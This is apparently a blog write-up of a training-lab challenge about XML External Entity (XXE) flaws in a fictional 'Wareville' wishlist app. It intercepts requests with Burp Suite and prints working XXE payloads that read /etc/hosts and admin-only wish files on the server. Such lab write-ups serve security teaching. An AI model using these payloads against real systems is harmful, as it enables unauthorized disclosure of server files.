Day 5: Exploring XML External Entity (XXE) Vulnerabilities in Web Applications

In today's blog post, we’ll dive into a critical vulnerability that was overlooked—the XML External Entity (XXE) vulnerability—and explore how we can exploit it to assess the security of the application. Let’s walk through what this vulnerability is, how it works, and how we can identify and exploit it using Burp Suite.

Understanding the Basics of XML and XXE

What is XML? XML (Extensible Markup Language) is a widely used method to transport and store data in a structured format. Think of XML as a digital filing cabinet, with data organized in "folders" (tags) that define the content. For example:

<people>
   <name>Glitch</name>
   <address>Wareville</address>
   <email>glitch@wareville.com</email>
   <phone>111000</phone>
</people>

In this XML document, tags like <name>, <address>, and <phone> store personal data about Glitch. The structure is easily shareable and customizable, making it popular in many web applications.

What is an XML External Entity (XXE)? XXE is an attack that takes advantage of XML parsers when they process external entities. When an XML document is parsed by a vulnerable web application, an attacker can inject malicious entities that point to sensitive files or resources, such as /etc/passwd, exposing confidential data or causing further exploitation.

The XXE Vulnerability in Wareville’s Wishlist Application

The platform we’re testing allows users to make holiday wishes by adding products to their wishlist, and the system stores these requests in a series of files (e.g., wish_1.txt). However, in the rush to launch, the development team overlooked critical security testing, including how the XML parser handles external entities.

Intercepting Requests with Burp Suite

Before diving into exploiting the vulnerability, it's essential to intercept the traffic between our browser and the web application. We’ll use Burp Suite, a powerful web vulnerability scanner, to capture and manipulate requests.

Configure Burp Suite Proxy: First, configure Burp Suite’s proxy to intercept requests. This allows us to inspect and modify the XML payload sent to the application.
Browse the Application: We start by browsing the product page (/product.php) and adding an item to our wishlist. This triggers an AJAX call to wishlist.php with XML data that contains product details.
Inspect the Request: Using Burp Suite’s HTTP history feature, we can see the XML request that the application sends to the server. It’s an XML structure like this:
```
 <wishlist>
    <user_id>1</user_id>
    <item>
       <product_id>1</product_id>
    </item>
 </wishlist>
```

The vulnerability lies in how the server processes this XML. The PHP code on the server uses the simplexml_load_string function with the LIBXML_NOENT option, which allows external entities to be loaded. This means that attackers can inject external entity references into the XML and gain access to sensitive files.

Crafting the Payload

Now that we understand how the system works, let’s craft an XML payload that exploits this vulnerability. We modify the XML request to reference an external entity that points to the /etc/hosts file, a sensitive file on the server. The payload looks like this:

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts">]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>

Here’s what happens:

The <!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts">]> declaration tells the XML parser to load the contents of /etc/hosts when it encounters &payload;.
When the XML is processed by the server, it will replace &payload; with the contents of the /etc/hosts file.

Exploiting the Vulnerability

To exploit the vulnerability, we use Burp Suite’s Repeater tool. By sending the modified XML request repeatedly, we can observe the server’s response. When we send the request with the payload, the application processes the malicious XML, and the response includes the contents of the /etc/hosts file, demonstrating that the system is vulnerable to XXE.

Accessing Sensitive Data: The Admin-Only Wish Pages

The real excitement comes when we apply the XXE vulnerability to gain access to restricted pages. The application restricts access to certain wish pages, such as /wishes/wish_1.txt, to admins only. We can use our XXE payload to read these files and access sensitive data.

To accomplish this, we build a payload that references the likely path of the wishes files. For example, we might try:

<!DOCTYPE foo [<!ENTITY payload SYSTEM "file:///var/www/html/wishes/wish_1.txt">]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>

By sending this payload, we can read the contents of the wish_1.txt file, potentially exposing sensitive data about other users' wishes. This is a clear demonstration of how XXE can be exploited to bypass restrictions and leak sensitive information.

Conclusion

As penetration testers, it’s crucial to identify and exploit vulnerabilities like XXE to help developers secure their applications. In the case of Wareville, the XXE vulnerability could lead to serious consequences, including unauthorized access to sensitive information and potential server compromise.